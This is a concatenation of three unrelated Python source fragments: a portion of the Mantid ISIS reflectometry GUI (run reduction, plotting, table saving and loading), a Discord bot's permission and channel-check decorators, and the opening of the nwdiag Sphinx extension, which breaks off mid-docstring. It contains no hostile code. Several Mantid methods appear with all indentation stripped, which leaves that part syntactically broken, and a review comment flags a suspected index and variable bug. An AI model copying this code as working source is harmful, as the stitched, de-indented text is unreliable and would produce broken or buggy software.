                                w1 = getWorkspace(wksp[0])
                                w2 = getWorkspace(wksp[-1])
                                if len(runno) == 2:
                                    outputwksp = runno[0] + '_' + runno[1][3:]
                                else:
                                    outputwksp = runno[0] + '_' + runno[-1][3:]
                                # get Qmax
                                # NOTE(review): 'i' below is the leftover index of the
                                # last reduced run; also this rebinds the overlapHigh
                                # LIST to a scalar float -- confirm intended.
                                if self.tableMain.item(row, i * 5 + 4).text() == '':
                                    overlapHigh = 0.3 * max(w1.readX(0))
                                Qmin = min(w1.readX(0))
                                Qmax = max(w2.readX(0))
                                if len(self.tableMain.item(row, i * 5 + 3).text()) > 0:
                                    Qmin = float(self.tableMain.item(row, i * 5 + 3).text())
                                if len(self.tableMain.item(row, i * 5 + 4).text()) > 0:
                                    Qmax = float(self.tableMain.item(row, i * 5 + 4).text())
                                if Qmax > _overallQMax:
                                    _overallQMax = Qmax
                                if Qmin < _overallQMin:
                                    _overallQMin = Qmin
                                combineDataMulti(wksp, outputwksp, overlapLow, overlapHigh,
                                                 _overallQMin, _overallQMax, -dqq, 1, keep=True,
                                                 scale_right=self.__scale_right)
                        # Enable the plot button
                        plotbutton = self.tableMain.cellWidget(row, self.plot_col).children()[1]
                        plotbutton.setProperty('runno', runno)
                        plotbutton.setProperty('overlapLow', overlapLow)
                        plotbutton.setProperty('overlapHigh', overlapHigh)
                        plotbutton.setProperty('wksp', wksp)
                        plotbutton.setEnabled(True)
                        self.statusMain.clearMessage()
            self.accMethod = None
            self.statusMain.clearMessage()
        except:
            self.statusMain.clearMessage()
            raise
    def _plot(self, plotbutton):
        """
        Plot the row belonging to the selected button

        Reads the run numbers, workspace names and overlap limits cached on
        the button by _process, plots each binned IvsQ curve (re-using a graph
        window per first workspace), and, when the row's stitch box is ticked,
        plots (stitching first if necessary) the combined output.
        """
        if not isinstance(plotbutton, QtGui.QPushButton):
            logger.error("Problem accessing cached data: Wrong data type passed, expected QtGui.QPushbutton")
            return
        import unicodedata
        # make sure the required data can be retrieved properly
        try:
            # properties come back as unicode; normalise to plain ascii strings
            runno_u = plotbutton.property('runno')
            runno = []
            for uni in runno_u:
                runno.append(unicodedata.normalize('NFKD', uni).encode('ascii', 'ignore'))
            wksp_u = plotbutton.property('wksp')
            wksp = []
            for uni in wksp_u:
                wksp.append(unicodedata.normalize('NFKD', uni).encode('ascii', 'ignore'))
            overlapLow = plotbutton.property('overlapLow')
            overlapHigh = plotbutton.property('overlapHigh')
            row = plotbutton.property('row')
            wkspBinned = []
            w1 = getWorkspace(wksp[0])
            w2 = getWorkspace(wksp[len(wksp) - 1])
            dqq = float(self.tableMain.item(row, 15).text())
        except:
            logger.error("Unable to plot row, required data couldn't be retrieved")
            self.__reset_plot_button(plotbutton)
            return
        for i in range(len(runno)):
            # Q plot range: saved overlap limits if present, else workspace extents
            if len(overlapLow):
                Qmin = overlapLow[0]
            else:
                Qmin = min(w1.readX(0))
            if len(overlapHigh):
                Qmax = overlapHigh[len(overlapHigh) - 1]
            else:
                Qmax = max(w2.readX(0))
            ws_name_binned = wksp[i]
            wkspBinned.append(ws_name_binned)
            wsb = getWorkspace(ws_name_binned)
            _Imin = min(wsb.readY(0))
            _Imax = max(wsb.readY(0))
            if canMantidPlot:
                # Get the existing graph if it exists
                base_graph = self.__graphs.get(wksp[0], None)
                # Clear the window if we're the first of a new set of curves
                clearWindow = (i == 0)
                # Plot the new curve
                base_graph = plotSpectrum(ws_name_binned, 0, True, window=base_graph, clearWindow=clearWindow)
                # Save the graph so we can re-use it
                self.__graphs[wksp[i]] = base_graph
                titl = groupGet(ws_name_binned, 'samp', 'run_title')
                if isinstance(titl, str):
                    base_graph.activeLayer().setTitle(titl)
                base_graph.activeLayer().setAxisScale(Layer.Left, _Imin * 0.1, _Imax * 10, Layer.Log10)
                base_graph.activeLayer().setAxisScale(Layer.Bottom, Qmin * 0.9, Qmax * 1.1, Layer.Log10)
                base_graph.activeLayer().setAutoScale()
        # Create and plot stitched outputs
        if self.__checked_row_stiched(row):
            if len(runno) == 2:
                outputwksp = runno[0] + '_' + runno[1][3:]
            else:
                outputwksp = runno[0] + '_' + runno[2][3:]
            if not getWorkspace(outputwksp, report_error=False):
                # Stitching has not been done as part of processing, so we need to do it here.
                combineDataMulti(wkspBinned, outputwksp, overlapLow, overlapHigh, Qmin, Qmax, -dqq, 1,
                                 keep=True, scale_right=self.__scale_right)
            Qmin = min(getWorkspace(outputwksp).readX(0))
            Qmax = max(getWorkspace(outputwksp).readX(0))
            if canMantidPlot:
                stitched_graph = self.__graphs.get(outputwksp, None)
                stitched_graph = plotSpectrum(outputwksp, 0, True, window=stitched_graph, clearWindow=True)
                titl = groupGet(outputwksp, 'samp', 'run_title')
                stitched_graph.activeLayer().setTitle(titl)
                stitched_graph.activeLayer().setAxisScale(Layer.Left, 1e-8, 100.0, Layer.Log10)
                stitched_graph.activeLayer().setAxisScale(Layer.Bottom, Qmin * 0.9, Qmax * 1.1, Layer.Log10)
                self.__graphs[outputwksp] = stitched_graph
def __name_trans(self, transrun):
"""
From a comma or colon separated string of run numbers
construct an output workspace name for the transmission workspace that fits the form
TRANS_{trans_1}_{trans_2}
"""
if bool(re.search("^(TRANS)", transrun)):
# The user has deliberately tried to supply the transmission run directly
return transrun
else:
split_trans = re.split(',|:', transrun)
if len(split_trans) == 0:
return None
name = 'TRANS'
for t in split_trans:
name += '_' + str(t)
return name
    def _do_run(self, runno, row, which):
        """
        Run quick on the given run and row

        *which* selects the 5-column slot (0-2) in *row*; the slot holds
        run, theta, transmission run(s), qmin, qmax, with dq/q in column 15.
        Reduces the run (via ReflectometryReductionOneAuto when algorithm use
        is enabled, otherwise via quick), re-using or creating the
        transmission workspace as needed.

        Returns (theta, qmin, qmax, wlam, wqBinned, wq).
        """
        transrun = str(self.tableMain.item(row, (which * 5) + 2).text())
        # Formulate a WS Name for the processed transmission run.
        transrun_named = self.__name_trans(transrun)
        # Look for existing transmission workspaces that match the name
        transmission_ws = None
        if mtd.doesExist(transrun_named):
            # only re-use it if it has already been converted to wavelength
            if isinstance(mtd[transrun_named], WorkspaceGroup):
                unit = mtd[transrun_named][0].getAxis(0).getUnit().unitID()
            else:
                unit = mtd[transrun_named].getAxis(0).getUnit().unitID()
            if unit == "Wavelength":
                logger.notice('Reusing transmission workspace ' + transrun_named)
                transmission_ws = mtd[transrun_named]
        angle_str = str(self.tableMain.item(row, which * 5 + 1).text())
        if len(angle_str) > 0:
            angle = float(angle_str)
        else:
            angle = None
        loadedRun = runno
        if load_live_runs.is_live_run(runno):
            load_live_runs.get_live_data(config['default.instrument'], frequency=self.live_freq,
                                         accumulation=self.live_method)
        wlam, wq, th, wqBinned = None, None, None, None
        # Only make a transmission workspace if we need one.
        if transrun and not transmission_ws:
            converter = ConvertToWavelength(transrun)
            size = converter.get_ws_list_size()
            out_ws_name = transrun_named
            if size == 1:
                trans1 = converter.get_workspace_from_list(0)
                transmission_ws = CreateTransmissionWorkspaceAuto(FirstTransmissionRun=trans1,
                                                                  OutputWorkspace=out_ws_name,
                                                                  Params=0.02, StartOverlap=10.0, EndOverlap=12.0,
                                                                  Version=1)
            elif size == 2:
                trans1 = converter.get_workspace_from_list(0)
                trans2 = converter.get_workspace_from_list(1)
                transmission_ws = CreateTransmissionWorkspaceAuto(FirstTransmissionRun=trans1,
                                                                  OutputWorkspace=out_ws_name,
                                                                  SecondTransmissionRun=trans2, Params=0.02,
                                                                  StartOverlap=10.0, EndOverlap=12.0, Version=1)
            else:
                raise RuntimeError("Up to 2 transmission runs can be specified. No more than that.")
        # Load the runs required ConvertToWavelength will deal with the transmission runs, while .to_workspace will deal with the run itself
        ws = ConvertToWavelength.to_workspace(loadedRun, ws_prefix="")
        if self.__alg_use:
            # optional per-row scale factor and momentum-transfer limits
            if self.tableMain.item(row, self.scale_col).text():
                factor = float(self.tableMain.item(row, self.scale_col).text())
            else:
                factor = 1.0
            if self.tableMain.item(row, 15).text():
                Qstep = float(self.tableMain.item(row, 15).text())
            else:
                Qstep = None
            if len(self.tableMain.item(row, which * 5 + 3).text()) > 0:
                Qmin = float(self.tableMain.item(row, which * 5 + 3).text())
            else:
                Qmin = None
            if len(self.tableMain.item(row, which * 5 + 4).text()) > 0:
                Qmax = float(self.tableMain.item(row, which * 5 + 4).text())
            else:
                Qmax = None
            # If we're dealing with a workspace group, we'll manually map execution over each group member
            # We do this so we can get ThetaOut correctly (see ticket #10597 for why we can't at the moment)
            if isinstance(ws, WorkspaceGroup):
                wqGroupBinned = []
                wqGroup = []
                wlamGroup = []
                thetaGroup = []
                group_trans_ws = transmission_ws
                for i in range(0, ws.size()):
                    # If the transmission workspace is a group, we'll use it pair-wise with the tof workspace group
                    if isinstance(transmission_ws, WorkspaceGroup):
                        group_trans_ws = transmission_ws[i]
                    alg = AlgorithmManager.create("ReflectometryReductionOneAuto")
                    alg.initialize()
                    alg.setProperty("InputWorkspace", ws[i])
                    if group_trans_ws:
                        alg.setProperty("FirstTransmissionRun", group_trans_ws)
                    if angle is not None:
                        alg.setProperty("ThetaIn", angle)
                    alg.setProperty("OutputWorkspaceBinned", runno + '_IvsQ_binned_' + str(i + 1))
                    alg.setProperty("OutputWorkspace", runno + '_IvsQ_' + str(i + 1))
                    alg.setProperty("OutputWorkspaceWavelength", runno + '_IvsLam_' + str(i + 1))
                    alg.setProperty("ScaleFactor", factor)
                    if Qstep is not None:
                        alg.setProperty("MomentumTransferStep", Qstep)
                    if Qmin is not None:
                        alg.setProperty("MomentumTransferMin", Qmin)
                    if Qmax is not None:
                        alg.setProperty("MomentumTransferMax", Qmax)
                    alg.execute()
                    wqBinned = mtd[runno + '_IvsQ_binned_' + str(i + 1)]
                    wq = mtd[runno + '_IvsQ_' + str(i + 1)]
                    wlam = mtd[runno + '_IvsLam_' + str(i + 1)]
                    th = alg.getProperty("ThetaIn").value
                    wqGroupBinned.append(wqBinned)
                    wqGroup.append(wq)
                    wlamGroup.append(wlam)
                    thetaGroup.append(th)
                wqBinned = GroupWorkspaces(InputWorkspaces=wqGroupBinned, OutputWorkspace=runno + '_IvsQ_binned')
                wq = GroupWorkspaces(InputWorkspaces=wqGroup, OutputWorkspace=runno + '_IvsQ')
                wlam = GroupWorkspaces(InputWorkspaces=wlamGroup, OutputWorkspace=runno + '_IvsLam')
                th = thetaGroup[0]
            else:
                alg = AlgorithmManager.create("ReflectometryReductionOneAuto")
                alg.initialize()
                alg.setProperty("InputWorkspace", ws)
                if transmission_ws:
                    alg.setProperty("FirstTransmissionRun", transmission_ws)
                if angle is not None:
                    alg.setProperty("ThetaIn", angle)
                alg.setProperty("OutputWorkspaceBinned", runno + '_IvsQ_binned')
                alg.setProperty("OutputWorkspace", runno + '_IvsQ')
                alg.setProperty("OutputWorkspaceWavelength", runno + '_IvsLam')
                alg.setProperty("ScaleFactor", factor)
                if Qstep is not None:
                    alg.setProperty("MomentumTransferStep", Qstep)
                if Qmin is not None:
                    alg.setProperty("MomentumTransferMin", Qmin)
                if Qmax is not None:
                    alg.setProperty("MomentumTransferMax", Qmax)
                alg.execute()
                wqBinned = mtd[runno + '_IvsQ_binned']
                wq = mtd[runno + '_IvsQ']
                wlam = mtd[runno + '_IvsLam']
                th = alg.getProperty("ThetaIn").value
            cleanup()
        else:
            wlam, wq, th = quick(loadedRun, trans=transmission_ws, theta=angle, tof_prefix="")
        if self.__group_tof_workspaces and not isinstance(ws, WorkspaceGroup):
            if "TOF" in mtd:
                tof_group = mtd["TOF"]
                if not tof_group.contains(loadedRun):
                    tof_group.add(loadedRun)
            else:
                tof_group = GroupWorkspaces(InputWorkspaces=loadedRun, OutputWorkspace="TOF")
        # summed/ranged run strings collapse to their first run number
        if ':' in runno:
            runno = runno.split(':')[0]
        if ',' in runno:
            runno = runno.split(',')[0]
        if isinstance(wq, WorkspaceGroup):
            inst = wq[0].getInstrument()
        else:
            inst = wq.getInstrument()
        # q limits from the instrument's wavelength range and the scattering angle
        lmin = inst.getNumberParameter('LambdaMin')[0]
        lmax = inst.getNumberParameter('LambdaMax')[0]
        qmin = 4 * math.pi / lmax * math.sin(th * math.pi / 180)
        qmax = 4 * math.pi / lmin * math.sin(th * math.pi / 180)
        return th, qmin, qmax, wlam, wqBinned, wq
def _save_table_contents(self, filename):
"""
Save the contents of the table
"""
try:
writer = csv.writer(open(filename, "wb"))
for row in range(self.tableMain.rowCount()):
rowtext = []
for column in range(self.tableMain.columnCount() - 2):
rowtext.append(self.tableMain.item(row, column).text())
if len(rowtext) > 0:
writer.writerow(rowtext)
self.current_table = filename
logger.notice("Saved file to " + filename)
self.mod_flag = False
except:
return False
self.mod_flag = False
return True
    def _save(self, failsave=False):
        """
        Save the table, showing no interface if not necessary. This also provides the failing save functionality.

        With failsave=True a timestamped recovery file is written next to the
        current table (or into defaultsave.directory / the temp dir).
        Otherwise saves to the current table, prompting for a filename only
        when none is set. Returns the result of _save_table_contents
        (False if the user cancelled the dialog).
        """
        filename = ''
        if failsave:
            # this is an emergency autosave as the program is failing
            logger.error(
                "The ISIS Reflectonomy GUI has encountered an error, it will now attempt to save a copy of your work.")
            msgBox = QtGui.QMessageBox()
            msgBox.setText(
                "The ISIS Reflectonomy GUI has encountered an error, it will now attempt to save a copy of your work.\n"
                "Please check the log for details.")
            msgBox.setStandardButtons(QtGui.QMessageBox.Ok)
            msgBox.setIcon(QtGui.QMessageBox.Critical)
            msgBox.setDefaultButton(QtGui.QMessageBox.Ok)
            msgBox.setEscapeButton(QtGui.QMessageBox.Ok)
            msgBox.exec_()
            import datetime
            failtime = datetime.datetime.today().strftime('%Y-%m-%d_%H-%M-%S')
            if self.current_table:
                filename = self.current_table.rsplit('.', 1)[0] + "_recovered_" + failtime + ".tbl"
            else:
                # no table loaded yet: fall back to the Mantid default save
                # directory, or the system temp dir if that doesn't exist
                mantidDefault = config['defaultsave.directory']
                if os.path.exists(mantidDefault):
                    filename = os.path.join(mantidDefault, "mantid_reflectometry_recovered_" + failtime + ".tbl")
                else:
                    import tempfile
                    tempDir = tempfile.gettempdir()
                    filename = os.path.join(tempDir, "mantid_reflectometry_recovered_" + failtime + ".tbl")
        else:
            # this is a save-on-quit or file->save
            if self.current_table:
                filename = self.current_table
            else:
                saveDialog = QtGui.QFileDialog(self.widgetMainRow.parent(), "Save Table")
                saveDialog.setFileMode(QtGui.QFileDialog.AnyFile)
                saveDialog.setNameFilter("Table Files (*.tbl);;All files (*)")
                saveDialog.setDefaultSuffix("tbl")
                saveDialog.setAcceptMode(QtGui.QFileDialog.AcceptSave)
                if saveDialog.exec_():
                    filename = saveDialog.selectedFiles()[0]
                else:
                    # user cancelled the dialog
                    return False
        return self._save_table_contents(filename)
def _save_as(self):
"""
show the save as dialog and save to a .tbl file with that name
"""
saveDialog = QtGui.QFileDialog(self.widgetMainRow.parent(), "Save Table")
saveDialog.setFileMode(QtGui.QFileDialog.AnyFile)
saveDialog.setNameFilter("Table Files (*.tbl);;All files (*)")
saveDialog.setDefaultSuffix("tbl")
saveDialog.setAcceptMode(QtGui.QFileDialog.AcceptSave)
if saveDialog.exec_():
filename = saveDialog.selectedFiles()[0]
self._save_table_contents(filename)
def _load_table(self):
"""
Load a .tbl file from disk
"""
self.loading = True
loadDialog = QtGui.QFileDialog(self.widgetMainRow.parent(), "Open Table")
loadDialog.setFileMode(QtGui.QFileDialog.ExistingFile)
loadDialog.setNameFilter("Table Files (*.tbl);;All files (*)")
if loadDialog.exec_():
try:
# before loading make sure you give them a chance to save
if self.mod_flag:
ret, _saved = self._save_check()
if ret == QtGui.QMessageBox.RejectRole:
# if they hit cancel abort the load
self.loading = False
return
self._reset_table()
filename = loadDialog.selectedFiles()[0]
self.current_table = filename
reader = csv.reader(open(filename, "rb"))
row = 0
for line in reader:
if row < 100:
for column in range(self.tableMain.columnCount() - 2):
item = QtGui.QTableWidgetItem()
item.setText(line[column])
self.tableMain.setItem(row, column, item)
row = row + 1
except:
logger.error('Could not load file: ' + str(filename) + '. File not found or unable to read from file.')
self.loading = False
self.mod_flag = False
def _reload_table(self):
"""
Reload the last loaded file from disk, replacing anything in the table already
"""
self.loading = True
filename = self.current_table
if filename:
if self.mod_flag:
msgBox = QtGui.QMessageBox()
msgBox.setText(
"The table has been modified. Are you sure you want to reload the table and lose your changes?")
msgBox.setStandardButtons(QtGui.QMessageBox.Yes | QtGui.QMessageBox.No)
msgBox.setIcon(QtGui.QMessageBox.Question)
msgBox.setDefaultButton(QtGui.QMessageBox.Yes)
msgBox.setEscapeButton(QtGui.QMessageBox.No)
ret = msgBox.exec_()
if ret == QtGui.QMessageBox.No:
# if they hit No abort the reload
self.loading = False
return
try:
self._reset_table()
reader = csv.reader(open(filename, "rb"))
row = 0
for line in reader:
if row < 100:
for column in range(self.tableMain.columnCount() - 2):
item = QtGui.QTableWidgetItem()
item.setText(line[column])
self.tableMain.setItem(row, column, item)
row = row + 1
self.mod_flag = False
except:
logger.error('Could not load file: ' + str(filename) + '. File not found or unable to read from file.')
else:
logger.notice('No file in table to reload.')
self.loading = False
def _save_workspaces(self):
"""
Shows the export dialog for saving workspaces to non mantid formats
"""
try:
Dialog = QtGui.QDialog()
u = Ui_SaveWindow()
u.setupUi(Dialog)
Dialog.exec_()
except Exception as ex:
logger.notice("Could not open save workspace dialog")
logger.notice(str(ex))
    def _options_dialog(self):
        """
        Shows the dialog for setting options regarding live data

        If the dialog is accepted, the chosen values are copied back onto this
        object and persisted via QSettings in two groups: the live-data group
        (frequency, method) and the generic group (algorithm use, ICAT
        download, TOF grouping, stitch scaling direction).
        """
        try:
            dialog_controller = ReflOptions(def_method=self.live_method, def_freq=self.live_freq,
                                            def_alg_use=self.__alg_use,
                                            def_icat_download=self.__icat_download,
                                            def_group_tof_workspaces=self.__group_tof_workspaces,
                                            def_stitch_right=self.__scale_right)
            if dialog_controller.exec_():
                # Fetch the settings back off the controller
                self.live_freq = dialog_controller.frequency()
                self.live_method = dialog_controller.method()
                self.__alg_use = dialog_controller.useAlg()
                self.__icat_download = dialog_controller.icatDownload()
                self.__group_tof_workspaces = dialog_controller.groupTOFWorkspaces()
                self.__scale_right = dialog_controller.stitchRight()
                # Persist the settings
                settings = QtCore.QSettings()
                settings.beginGroup(self.__live_data_settings)
                settings.setValue(self.__live_data_frequency_key, self.live_freq)
                settings.setValue(self.__live_data_method_key, self.live_method)
                settings.endGroup()
                settings.beginGroup(self.__generic_settings)
                settings.setValue(self.__ads_use_key, self.__alg_use)
                settings.setValue(self.__icat_download_key, self.__icat_download)
                settings.setValue(self.__group_tof_workspaces_key, self.__group_tof_workspaces)
                settings.setValue(self.__stitch_right_key, self.__scale_right)
                settings.endGroup()
                del settings
        except Exception as ex:
            logger.notice("Problem opening options dialog or problem retrieving values from dialog")
            logger.notice(str(ex))
    def _choose_columns(self):
        """
        shows the choose columns dialog for hiding and revealing of columns

        Accepted choices are applied to the table immediately and persisted
        per-column (key -> visible bool) in the column-settings QSettings group.
        """
        try:
            dialog = ReflChoose(self.shown_cols, self.tableMain)
            if dialog.exec_():
                settings = QtCore.QSettings()
                settings.beginGroup(self.__column_settings)
                # NOTE: iteritems() is Python 2 only
                for key, value in dialog.visiblestates.iteritems():
                    self.shown_cols[key] = value
                    settings.setValue(str(key), value)
                    if value:
                        self.tableMain.showColumn(key)
                    else:
                        self.tableMain.hideColumn(key)
                settings.endGroup()
                del settings
        except Exception as ex:
            logger.notice("Could not open choose columns dialog")
            logger.notice(str(ex))
def _show_help(self):
"""
Launches the wiki page for this interface
"""
import webbrowser
webbrowser.open('http://www.mantidproject.org/ISIS_Reflectometry_GUI')
def getLogValue(wksp, field=''):
    """
    Return the value of sample log *field* of the given workspace (or
    workspace name); for series logs the most recent entry is returned.
    """
    log_value = getWorkspace(wksp).getRun().getLogData(field).value
    if isinstance(log_value, (int, str)):
        return log_value
    return log_value[-1]
def getWorkspace(wksp, report_error=True):
    """
    Gets the first workspace associated with the given string. Does not load.

    A Workspace instance is returned as-is; a name is looked up in the ADS,
    with the first member returned for groups. Returns False when the name
    does not exist (logged as an error unless report_error is False).
    """
    if isinstance(wksp, Workspace):
        return wksp
    elif isinstance(wksp, str):
        exists = mtd.doesExist(wksp)
        if not exists:
            if report_error:
                logger.error("Unable to get workspace: " + str(wksp))
                return exists  # Doesn't exist
            else:
                return exists  # Doesn't exist
        elif isinstance(mtd[wksp], WorkspaceGroup):
            # for a group, hand back the first member
            wout = mtd[wksp][0]
        else:
            wout = mtd[wksp]
        return wout
|
from discord.ext import commands
import discord.utils
def is_owner_check(ctx):
    """Return True when the message author (string form) is the configured bot master."""
    return str(ctx.message.author) == ctx.bot.config['master']
def is_owner():
    """Command-check decorator: restrict a command to the configured bot master."""
    return commands.check(is_owner_check)
def check_permissions(ctx, perms):
    """Return True when the author has every permission in *perms*
    (mapping of permission name -> required bool) in the current channel.
    An empty mapping always fails."""
    # NOTE: owner bypass via is_owner_check is intentionally disabled here
    if not perms:
        return False
    author = ctx.message.author
    resolved = ctx.message.channel.permissions_for(author)
    for name, required in perms.items():
        if getattr(resolved, name, None) != required:
            return False
    return True
def role_or_permissions(ctx, check, **perms):
    """True when the author either satisfies *perms* or has a role matching *check*."""
    if check_permissions(ctx, perms):
        return True
    if ctx.message.channel.is_private:
        return False  # can't have roles in PMs
    matched_role = discord.utils.find(check, ctx.message.author.roles)
    return matched_role is not None
def serverowner_or_permissions(**perms):
    """Command check passing for the server owner, or anyone satisfying *perms*."""
    def predicate(ctx):
        if ctx.message.author.id == ctx.message.server.owner.id:
            return True
        return check_permissions(ctx, perms)
    return commands.check(predicate)
def serverowner():
    """Command-check decorator: restrict a command to the server owner."""
    return serverowner_or_permissions()
def check_wantchannel(ctx):
    """True only when the message was sent in one of the server's configured want channels."""
    if ctx.message.server is None:
        return False
    channel = ctx.message.channel
    server = ctx.message.server
    try:
        want_channels = ctx.bot.server_dict[server]['want_channel_list']
    except KeyError:
        return False
    # Explicit bool; the original fell through and returned None when the
    # channel was not in the list.
    return channel in want_channels
def check_citychannel(ctx):
    """True only when the message was sent in one of the server's configured city channels."""
    if ctx.message.server is None:
        return False
    channel = ctx.message.channel.name
    server = ctx.message.server
    try:
        city_channels = ctx.bot.server_dict[server]['city_channels'].keys()
    except KeyError:
        return False
    # Explicit bool instead of the original's implicit None fall-through.
    return channel in city_channels
def check_raidchannel(ctx):
    """True only when the message was sent in one of the server's raid channels."""
    if ctx.message.server is None:
        return False
    channel = ctx.message.channel
    server = ctx.message.server
    try:
        raid_channels = ctx.bot.server_dict[server]['raidchannel_dict'].keys()
    except KeyError:
        return False
    # Explicit bool instead of the original's implicit None fall-through.
    return channel in raid_channels
def check_eggchannel(ctx):
    """Return True iff the current channel is a raid channel of type 'egg'.

    Fixes two issues in the original: the local variable shadowed the
    builtin ``type``, and the non-egg case fell through to an implicit
    None instead of returning False.
    """
    if ctx.message.server is None:
        return False
    channel = ctx.message.channel
    server = ctx.message.server
    try:
        channel_type = ctx.bot.server_dict[server]['raidchannel_dict'][channel]['type']
    except KeyError:
        return False
    return channel_type == 'egg'
def check_raidactive(ctx):
    """Return the raid channel's 'active' flag; False when the channel is
    not a tracked raid channel or the message is not from a server."""
    message = ctx.message
    if message.server is None:
        return False
    try:
        return ctx.bot.server_dict[message.server]['raidchannel_dict'][message.channel]['active']
    except KeyError:
        return False
def _server_setting(ctx, key):
    """Look up *key* in this server's config dict; False when the message
    is not from a server or the key is absent."""
    if ctx.message.server is None:
        return False
    try:
        return ctx.bot.server_dict[ctx.message.server][key]
    except KeyError:
        return False
def check_raidset(ctx):
    """Return the server's 'raidset' flag (False when unavailable)."""
    return _server_setting(ctx, 'raidset')
def check_wildset(ctx):
    """Return the server's 'wildset' flag (False when unavailable)."""
    return _server_setting(ctx, 'wildset')
def check_wantset(ctx):
    """Return the server's 'wantset' flag (False when unavailable)."""
    return _server_setting(ctx, 'wantset')
def check_teamset(ctx):
    """Return the server's 'team' flag (False when unavailable)."""
    return _server_setting(ctx, 'team')
def teamset():
    """Command check: team configuration is enabled for this server."""
    return commands.check(check_teamset)
def wantset():
    """Command check: the want feature is enabled for this server."""
    return commands.check(check_wantset)
def wildset():
    """Command check: wild reporting is enabled for this server."""
    return commands.check(check_wildset)
def raidset():
    """Command check: raid reporting is enabled for this server."""
    return commands.check(check_raidset)
def citychannel():
    """Command check: invoked from a configured city channel."""
    return commands.check(check_citychannel)
def wantchannel():
    """Command check: want feature enabled AND invoked in a want channel."""
    def predicate(ctx):
        if not check_wantset(ctx):
            return None  # preserve original implicit-None fall-through
        return check_wantchannel(ctx)
    return commands.check(predicate)
def raidchannel():
    """Command check: invoked from a raid channel."""
    return commands.check(check_raidchannel)
def notraidchannel():
    """Command check: invoked anywhere EXCEPT a raid channel."""
    def predicate(ctx):
        return not check_raidchannel(ctx)
    return commands.check(predicate)
def activeraidchannel():
    """Command check: invoked from a raid channel that is still active."""
    def predicate(ctx):
        if not check_raidchannel(ctx):
            return None  # preserve original implicit-None fall-through
        return check_raidactive(ctx)
    return commands.check(predicate)
def cityraidchannel():
    """Command check: invoked from either a raid channel or a city channel."""
    def predicate(ctx):
        if check_raidchannel(ctx) == True or check_citychannel(ctx) == True:
            return True
        return None
    return commands.check(predicate)
def cityeggchannel():
    """Command check: an egg-type raid channel, or any city channel."""
    def predicate(ctx):
        if check_raidchannel(ctx) == True:
            return True if check_eggchannel(ctx) == True else None
        return True if check_citychannel(ctx) == True else None
    return commands.check(predicate)
|
"""
nwdiag.sphinx_ext
~~~~~~~~~~~~~~~~~~~~
Allow nwdiag-formatted diagrams to be included in Sphinx-generated
documents inline.
:copyright: Copyright 2010 by Takeshi Komiya.
:license: BSDL.
"""
from __future__ import absolute_import
import os
import re
import traceback
from collections import namedtuple
from docutils import nodes
from sphinx import addnodes
from sphinx.util.osutil import ensuredir
import nwdiag.utils.rst.nodes
import nwdiag.utils.rst.directives
from blockdiag.utils.bootstrap import detectfont
from blockdiag.utils.compat import u, string_types
from blockdiag.utils.fontmap import FontMap
fontmap = None
class nwdiag_node(nwdiag.utils.rst.nodes.nwdiag):
    """Doctree node for an nwdiag diagram; knows how to build its drawer
    and where its rendered image lives on disk."""
    def to_drawer(self, image_format, builder, **kwargs):
        """Create the diagram drawer for *image_format*.

        The output filename may be forced via ``kwargs['filename']``;
        otherwise it is derived from the builder's output directory.
        Node hrefs are rewritten so ``:ref:`` targets become real links.
        """
        if 'filename' in kwargs:
            filename = kwargs.pop('filename')
        else:
            filename = self.get_abspath(image_format, builder)
        antialias = builder.config.nwdiag_antialias
        image = super(nwdiag_node, self).to_drawer(image_format, filename, fontmap,
                                                   antialias=antialias, **kwargs)
        for node in image.diagram.traverse_nodes():
            node.href = resolve_reference(builder, node.href)
        return image
    def get_relpath(self, image_format, builder):
        """Path of the rendered image relative to the document output."""
        options = dict(antialias=builder.config.nwdiag_antialias,
                       fontpath=builder.config.nwdiag_fontpath,
                       fontmap=builder.config.nwdiag_fontmap,
                       format=image_format)
        # HTML builders expose 'imgpath'; other builders write next to outdir.
        outputdir = getattr(builder, 'imgpath', builder.outdir)
        return os.path.join(outputdir, self.get_path(**options))
    def get_abspath(self, image_format, builder):
        """Absolute filesystem path of the rendered image; creates the
        containing directory as a side effect."""
        options = dict(antialias=builder.config.nwdiag_antialias,
                       fontpath=builder.config.nwdiag_fontpath,
                       fontmap=builder.config.nwdiag_fontmap,
                       format=image_format)
        if hasattr(builder, 'imgpath'):
            outputdir = os.path.join(builder.outdir, '_images')
        else:
            outputdir = builder.outdir
        path = os.path.join(outputdir, self.get_path(**options))
        ensuredir(os.path.dirname(path))
        return path
class Nwdiag(nwdiag.utils.rst.directives.NwdiagDirective):
    """The ``.. nwdiag::`` directive; image conversion is deferred to the
    HTML visitor / doctree-resolved hook, so the raw node is kept."""
    node_class = nwdiag_node
    def node2image(self, node, diagram):
        # Rendering happens later (builder-dependent); keep the node as-is.
        return node
def resolve_reference(builder, href):
    """Translate an ``:ref:`label``` style *href* into a concrete anchor
    or URI via the Sphinx 'std' domain; pass plain hrefs through."""
    if href is None:
        return None
    matched = re.compile(u("^:ref:`(.+?)`"), re.UNICODE).search(href)
    if matched is None:
        return href
    refid = matched.group(1)
    domain = builder.env.domains['std']
    node = addnodes.pending_xref(refexplicit=False)
    xref = domain.resolve_xref(builder.env, builder.current_docname, builder,
                               'ref', refid, node, node)
    if not xref:
        builder.warn('undefined label: %s' % refid)
        return None
    if 'refid' in xref:
        return "#" + xref['refid']
    return xref['refuri']
def html_render_svg(self, node):
    """Render *node* inline as SVG and append the markup to the HTML body."""
    image = node.to_drawer('SVG', self.builder, filename=None, nodoctype=True)
    image.draw()
    if 'align' in node['options']:
        align = node['options']['align']
        self.body.append('<div align="%s" class="align-%s">' % (align, align))
    else:
        self.body.append('<div>')
    self.context.append('</div>\n')
    # reftarget: emit anchors so references to this diagram resolve
    for node_id in node['ids']:
        self.body.append('<span id="%s"></span>' % node_id)
    # resize image according to width/height/scale options
    size = image.pagesize().resize(**node['options'])
    self.body.append(image.save(size))
    self.context.append('')
def html_render_clickablemap(self, image, width_ratio, height_ratio):
    """Emit an HTML <map> with one <area> per diagram node carrying an
    href, scaling cell coordinates by the given display ratios."""
    linked = [n for n in image.nodes if n.href]
    if not linked:
        return
    self.body.append('<map name="map_%d">' % id(image))
    area = '<area shape="rect" coords="%s,%s,%s,%s" href="%s">'
    for n in linked:
        x1, y1, x2, y2 = image.metrics.cell(n)
        scaled = (x1 * width_ratio, y1 * height_ratio,
                  x2 * width_ratio, y2 * height_ratio)
        self.body.append(area % (scaled + (n.href,)))
    self.body.append('</map>')
def html_render_png(self, node):
    """Render *node* to a PNG file (cached on disk) and append an <img>
    tag, optionally wrapped in an alignment <div>, a link to the
